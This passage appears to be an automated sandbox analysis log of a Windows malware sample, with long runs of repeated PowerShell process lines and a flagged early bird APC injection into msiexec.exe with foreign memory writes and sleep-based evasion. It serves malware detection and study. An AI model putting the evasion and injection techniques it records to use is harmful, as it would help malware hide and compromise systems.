      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7351Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2267Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 3280Thread sleep count: 36 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 3280Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005887000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005887000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005887000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: msiexec.exe, 00000007.00000003.1836071609.0000000006317000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.0000000006317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeAPI call chain: ExitProcess graph end nodegraph_0-3761
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeAPI call chain: ExitProcess graph end nodegraph_0-3753
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
